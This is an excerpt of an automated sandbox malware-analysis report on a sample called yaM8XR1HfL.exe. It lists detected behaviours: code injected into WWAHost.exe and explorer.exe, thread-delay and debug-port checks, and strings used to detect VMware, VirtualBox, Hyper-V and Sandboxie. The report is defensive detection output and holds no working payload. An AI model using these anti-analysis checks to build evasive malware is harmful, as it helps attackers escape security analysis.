          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00149760 GetSystemTimeAsFileTime followed by cmp: cmp al, 01h and CTI: jne 00149886h9_2_00149760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0017212C memset,FindFirstFileW,FindClose,9_2_0017212C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2499817163.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C096E rdtsc 4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2B60 NtClose,LdrInitializeThunk,4_2_014C2B60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00162802 #797,GetCurrentThread,SetThreadDescription,IsDebuggerPresent,RegOpenKeyExW,GetCurrentProcessId,RegCloseKey,ExitProcess,9_2_00162802
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress,9_2_0014AA8C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01518158 mov eax, dword ptr fs:[00000030h]4_2_01518158
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C156 mov eax, dword ptr fs:[00000030h]4_2_0147C156
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01514144 mov eax, dword ptr fs:[00000030h]4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01514144 mov eax, dword ptr fs:[00000030h]4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01514144 mov ecx, dword ptr fs:[00000030h]4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01514144 mov eax, dword ptr fs:[00000030h]4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01514144 mov eax, dword ptr fs:[00000030h]4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486154 mov eax, dword ptr fs:[00000030h]4_2_01486154
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486154 mov eax, dword ptr fs:[00000030h]4_2_01486154
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554164 mov eax, dword ptr fs:[00000030h]4_2_01554164
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554164 mov eax, dword ptr fs:[00000030h]4_2_01554164
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01540115 mov eax, dword ptr fs:[00000030h]4_2_01540115
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152A118 mov ecx, dword ptr fs:[00000030h]4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h]4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h]4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h]4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h]4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B0124 mov eax, dword ptr fs:[00000030h]4_2_014B0124
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h]4_2_015461C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h]4_2_015461C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h]4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h]4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE1D0 mov ecx, dword ptr fs:[00000030h]4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h]4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h]4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015561E5 mov eax, dword ptr fs:[00000030h]4_2_015561E5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B01F8 mov eax, dword ptr fs:[00000030h]4_2_014B01F8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C0185 mov eax, dword ptr fs:[00000030h]4_2_014C0185
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524180 mov eax, dword ptr fs:[00000030h]4_2_01524180
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524180 mov eax, dword ptr fs:[00000030h]4_2_01524180
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h]4_2_0153C188
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h]4_2_0153C188
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506050 mov eax, dword ptr fs:[00000030h]4_2_01506050
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482050 mov eax, dword ptr fs:[00000030h]4_2_01482050
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AC073 mov eax, dword ptr fs:[00000030h]4_2_014AC073
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01504000 mov ecx, dword ptr fs:[00000030h]4_2_01504000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516030 mov eax, dword ptr fs:[00000030h]4_2_01516030
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A020 mov eax, dword ptr fs:[00000030h]4_2_0147A020
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C020 mov eax, dword ptr fs:[00000030h]4_2_0147C020
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015020DE mov eax, dword ptr fs:[00000030h]4_2_015020DE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014880E9 mov eax, dword ptr fs:[00000030h]4_2_014880E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0147A0E3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015060E0 mov eax, dword ptr fs:[00000030h]4_2_015060E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C0F0 mov eax, dword ptr fs:[00000030h]4_2_0147C0F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C20F0 mov ecx, dword ptr fs:[00000030h]4_2_014C20F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148208A mov eax, dword ptr fs:[00000030h]4_2_0148208A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014780A0 mov eax, dword ptr fs:[00000030h]4_2_014780A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015460B8 mov eax, dword ptr fs:[00000030h]4_2_015460B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015460B8 mov ecx, dword ptr fs:[00000030h]4_2_015460B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015180A8 mov eax, dword ptr fs:[00000030h]4_2_015180A8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01528350 mov ecx, dword ptr fs:[00000030h]4_2_01528350
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154A352 mov eax, dword ptr fs:[00000030h]4_2_0154A352
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov ecx, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155634F mov eax, dword ptr fs:[00000030h]4_2_0155634F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152437C mov eax, dword ptr fs:[00000030h]4_2_0152437C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C310 mov ecx, dword ptr fs:[00000030h]4_2_0147C310
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A0310 mov ecx, dword ptr fs:[00000030h]4_2_014A0310
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov ecx, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h]4_2_015243D4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h]4_2_015243D4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov ecx, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015063C0 mov eax, dword ptr fs:[00000030h]4_2_015063C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C3CD mov eax, dword ptr fs:[00000030h]4_2_0153C3CD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B63FF mov eax, dword ptr fs:[00000030h]4_2_014B63FF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A438F mov eax, dword ptr fs:[00000030h]4_2_014A438F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A438F mov eax, dword ptr fs:[00000030h]4_2_014A438F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
